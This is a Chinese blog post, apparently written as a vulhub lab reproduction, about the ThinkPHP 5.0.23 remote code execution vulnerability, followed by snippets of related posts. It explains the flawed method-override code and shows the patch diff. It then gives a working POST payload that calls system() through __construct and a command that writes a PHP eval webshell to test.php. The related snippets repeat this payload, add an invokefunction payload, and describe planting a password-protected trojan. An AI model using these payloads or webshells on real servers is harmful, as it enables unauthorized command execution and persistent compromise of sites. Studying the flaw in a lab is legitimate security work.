漏洞复现----38、ThinkPHP5 5.0.23 远程代码执行漏洞

已于 2022-06-29 14:36:59 修改
阅读量1.6k 收藏
点赞数
分类专栏: 网络安全技术 # 漏洞复现 文章标签: ThinkPHP 5.0.23 远程代码执行漏洞
于 2022-06-29 14:36:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/118722387
版权

文章目录

一、漏洞简介

5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
Thinkphp源码下载

漏洞代码如下

@@ -522,8 +522,11 @@ public function method($method = false)
            return $this->server('REQUEST_METHOD') ?: 'GET';
        } elseif (!$this->method) {
            if (isset($_POST[Config::get('var_method')])) {
                $this->method = strtoupper($_POST[Config::get('var_method')]);
                $this->{$this->method}($_POST);
                $method = strtoupper($_POST[Config::get('var_method')]);
                if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
                    $this->method = $method;
                    $this->{$this->method}($_POST);
                }
            } elseif (isset($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'])) {
                $this->method = strtoupper($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE']);
            } else {

调用$this->{$this->method}($_POST);语句。当我们可以控制$method的值时,就可以调用Request类的任意方法,而当调用构造方法__construct()时,就可以覆盖Request类的任意成员变量,可以覆盖$this->method,指定check()方法中的$method值。

二、漏洞复现

访问IP:8080抓包
更改请求为 POST /index.php?s=captcha
消息正文为:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=command
commond=id/ls/whoami/ echo <?php eval($_POST['cmd']);?> > test.php

在这里插入图片描述
test.php上传成功

李沉肩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 880
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2413
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1826
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 730
vulhub thinkphp5 5.0.23 远程代码执行漏洞
Thinkphp5.0.23远程代码执行漏洞
最新发布
hovcfuti的博客
10-13 301
漏洞简介Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。影响版本漏洞复现在vulhub里面拉取靶场访问可以使用burp suite抓包,也可以使用hackbar浏览器插件,总之可以发post请求包就好请求文件:/index.php?
[ 网络安全]MPHP(ThinkPHPV5.0.23原理刨析)漏洞利用工具
03-03 957
ThinkPHPV5.0.23漏洞利用工具
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP v5.0.23核心版详解》 ThinkPHP,作为一款深受开发者喜爱的PHP框架,自诞生以来,以其简洁、高效的特性在PHP社区中占据了一席之地。尤其是ThinkPHP v5.0系列,它在继承了ThinkPHP框架一贯的优势之外,...
Thiinkphp 5.0.23-rce 漏洞复现(vulhub)
MDSEC的博客
08-22 290
形成原因是因为其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。这样thinkphp 5.0.23-rce漏洞复现完成了。2>.bp抓包修改post请求,传递参数。响应包状态码为500,但是可以访问页面。访问8080端口的本机地址。尝试写入phpinfo。
ThinkPHP v5.0.24 完整版.zip
07-16
ThinkPHP v5.0.24 完整版 更新日志 改进关联的save方法 改进模型数据验证 Collection增加values方法 改进unique验证方法 改进Request类的method方法 ThinkPHP简介 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和 改进,众多的典型案例确保可以稳定用于商业以及门户级的开发。 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,在项目配置、类 库导入、模版引擎、查询语言、自动验证、视图模型、项目编译、缓存机制、SEO支持、分布式数据库、多数据库连接和切换、认证机制和扩展性方面均有独特的 表现。 ThinkPHP主要特性包括 规范:遵循PSR-2、PSR-4规范,Composer及单元测试支持; 严谨:异常严谨的错误检测和安全机制,详细的日志信息,为你的开发保驾护航; 灵活:减少核心依赖,扩展更灵活、方便,支持命令行指令扩展; API友好:出色的性能和REST支持、远程调试,更好的支持API开发; 高效:惰性加载,及路由、配置和自动加载的缓存机制; ORM:重构的数据库、模型及关联,MongoDb支持; ThinkPHP页面展示  相关阅读 同类推荐:站长常用源码
ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5
02-24
ThinkPHP5.0.5完整版_ThinkPHP_full_v5.0.5 欢迎关注PHP学习博客:http://blog.csdn.net/column/details/14209.html
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp5.1:官网thinkphp5.1源码,干净源码,供大家使用
03-23
ThinkPHP 5.1(LTS版本)-12载初心,你值得信赖PHP框架 ThinkPHP5.1对逐步架构做了进一步的改进,减少了依赖,其主要特性包括: 采用容器统一管理对象 支持门面 注解路由支持 路由跨域请求支持 配置和路由目录独立 取消系统常量 助手函数增强 类库别名机制 增加条件查询 改进查询机制 配置采用二级 依赖注入完善 支持PSR-3日志规范 中间件支持(V5.1.6 +) Swoole / Workerman支持(V5.1.18 +) ThinkPHP5的运行环境要求PHP5.6以上。 安装 使用composer安装 composer create-project topthink/think tp 启动服务 cd tp php think run 然后就可以在浏览器中访问 http://localhost:8000 更新框架 composer update topt
微信分享(二) (ThinkPHP5.1.38 分享)
努力奔跑的少年
10-25 1213
1. 下载微信分享需要用的sdk https://pan.baidu.com/s/1XnX6qHht7_dR5SbMnH72Ow tp5.1.38 源码https://pan.baidu.com/s/1VoCSBTgdeaV_YS_SjwxumQ 我是将文件夹的文件放在了/extend/org/ 一共三个文件(修改过jssdk 中的) 修改的第一处: 修改的第二处: 修改第...
thinkphp5.0.23 远程代码执行复现
qq_38807738的博客
02-08 7067
漏洞影响版本5.0.23之前的版本 我使用的是vulhub下提供的漏洞环境,如何使用自行百度谷歌。 装好后打开网站如下   使用如下poc,即可实现远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: 你的id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Ge...
ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用
weixin_30617797的博客
07-20 4216
漏洞影响范围: 5.0.0-5.0.23 官方已在5.0.24版本修复该漏洞。测试Payload: /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() /index.php?s=inde...
ThinkPHP5.0.23源码分析系列(一):入口文件
weixin_34409741的博客
12-17 299
2019独角兽企业重金招聘Python工程师标准>>> ...
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值